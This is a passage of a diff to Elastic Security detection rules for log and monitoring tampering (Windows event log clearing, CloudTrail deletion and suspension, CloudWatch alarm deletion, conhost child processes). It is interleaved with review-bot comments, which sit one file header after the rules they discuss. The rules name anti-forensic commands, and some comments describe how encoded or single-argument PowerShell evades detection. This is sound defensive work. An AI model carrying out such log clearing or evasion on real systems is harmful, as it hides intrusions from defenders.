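Review bot: The rewritten `note` does not tell analysts that the detection rests on literal command-line tokens, so an `-EncodedCommand` payload, a script file, or a concatenated string that never spells `Clear-History` on the command line produces no alert and a "no hits" search proves nothing. Suggest adding a bullet to the investigation steps such as `- This rule matches literal command-line text only; encoded or scripted invocations are not detected, so check PowerShell script block logs (where collected) for the same cmdlets.` Separately, `process.args : ("*Remove-Item*", "rm")` mixes a wildcard with an exact `rm`, so `rm` inside a single `-Command "..."` argument is missed while the neighbouring terms are all wildcarded; that query line is context here, not introduced by this commit, but the inconsistency is worth a follow-up.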
@@ -55,5 +78,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json
index ce68ce01ae29b..b433b81e0c732 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Clearing Windows Event Logs", - "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear\nnon-relevant event logs using this mechanism. 
If this activity is expected and noisy in your environment, consider\nadding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. 
Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear\nnon-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider\nadding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. 
Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"process_started\", \"start\") and\n (process.name : \"wevtutil.exe\" or process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\") or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Clear-EventLog\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
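Review bot: In `query`, EQL gives `and` precedence over `or`, so the `event.type in ("process_started", "start")` guard and the wevtutil conditions bind only to the first branch; the PowerShell branch after `or` has no event-type restriction and will match every process event carrying `Clear-EventLog`, which on sources that also emit end events produces duplicate alerts per invocation. The branch also uses an exact `process.args : "Clear-EventLog"` while the console-history rule in this same change uses `"*Clear-History*"`, so `-Command "Clear-EventLog Security"` passed as one argument is not caught. Suggested query: `process where event.type in ("process_started", "start") and ((process.name : "wevtutil.exe" or process.pe.original_file_name == "wevtutil.exe") and process.args : ("/e:false", "cl", "clear-log") or process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : "*Clear-EventLog*")`. The query is a context line here, so this predates the commit, but the commit bumps the rule version without fixing it.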
@@ -50,5 +73,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 13
+ "version": 15
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json
index 3989ceed2bab9..8bef83a974832 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json
@@ -14,6 +14,13 @@ "name": "Windows Event Logs Cleared", "note": "## Triage and analysis\n\n### Investigating Windows Event Logs Cleared\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the occurrence of clear actions on the `security` event log.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n",
 "query": "event.action:(\"audit-log-cleared\" or \"Log clear\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "45ac4800-840f-414c-b221-53dd36a5aaf7",
 "severity": "low",
@@ -50,5 +57,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json
index cc131b5236a62..6c3e7cde8f6d2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Deleted\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies the deletion of an AWS log trail using the API `DeleteTrail` action. 
Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to 
identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:DeleteTrail and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_DeleteTrail.html",
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/delete-trail.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "7024e2a0-315d-4334-bb1a-441c593e16ab",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -58,5 +88,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json
index 27990a74ac5b2..c3b9963216e67 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json
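Review bot: The new `note` never instructs the responder to restore logging: after a `DeleteTrail` the trail is gone, yet the `Response and remediation` list only says to return systems "to their normal operational levels" in general terms, and it says nothing about the trail's destination bucket, which is the obvious next target for the same attacker. Suggest a concrete bullet such as `- Recreate the deleted trail (or confirm another trail still covers the affected account and regions) and verify that previously delivered log files in the trail's S3 bucket were not removed or altered.` The `event.outcome:success` filter in `query` (unchanged here) also means a denied `DeleteTrail` attempt from an under-privileged compromised principal is invisible to this rule; that limitation deserves a sentence in the note or a companion rule on failed attempts.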
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Suspended", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Suspended\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies the suspension of an AWS log trail using the API `StopLogging` action. 
Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to 
identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:StopLogging and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_StopLogging.html",
 "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/stop-logging.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "1aa8fa52-44a7-4dae-b058-f3333b91c8d7",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -58,5 +88,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json
index e188a1ee50c65..7e35d33a173e9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json
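Review bot: The new `note` carries a copy-paste error from the DeleteTrail rule: the investigation step `- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.` talks about deletion, but this rule fires on `StopLogging`, where the trail still exists and has merely stopped recording. Suggest `- Investigate the suspended log trail's criticality and whether the responsible team is aware of the suspension.` The `Response and remediation` list should also tell the responder to resume logging on the affected trail and to check whether events delivered before the suspension were tampered with, since nothing in the current list restores the lost visibility.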
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Alarm Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Alarm Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nCloudWatch Alarms is a feature that allows you to watch CloudWatch metrics and to receive notifications when the metrics\nfall outside of the levels (high or low thresholds) that you configure.\n\nThis rule looks for the deletion of a alarm using the API `DeleteAlarms` action. 
Attackers can do this to cover their\ntracks and evade security defenses.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if there is a justification for this behavior.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal 
ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:monitoring.amazonaws.com and event.action:DeleteAlarms and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudwatch/delete-alarms.html", "https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DeleteAlarms.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": 
"f772ec8a-e182-483c-91d2-72058f76a44c", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json index de61101b8699f..2cd4074bfb1f5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json 
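Review bot: The new note string for this rule carries a typo in the sentence that states what the rule detects: the fragment `This rule looks for the deletion of a alarm using the API` should read `the deletion of an alarm using the API`. This text is rendered to analysts in the rule's investigation guide, so it is worth fixing before the version bump ships. The `required_fields` list added below it matches the four fields the query references (event.action, event.dataset, event.outcome, event.provider), so nothing else in the hunk needs changing.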
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process from Conhost", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process from Conhost\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nThe `conhost.exe` process doesn't normally have child processes. Any processes spawned by the `conhost.exe` process can indicate code\ninjection activity or a suspicious process masquerading as the `conhost.exe` process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### Related rules\n\n- Conhost Spawned By Suspicious Parent Process - 05b358de-aa6d-4f6c-89e6-78f74018b43b\n- Suspicious PowerShell 
Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process from Conhost\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nThe `conhost.exe` process doesn't normally have child processes. Any processes spawned by the `conhost.exe` process can indicate code\ninjection activity or a suspicious process masquerading as the `conhost.exe` process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### Related rules\n\n- Conhost Spawned By Suspicious Parent Process - 05b358de-aa6d-4f6c-89e6-78f74018b43b\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
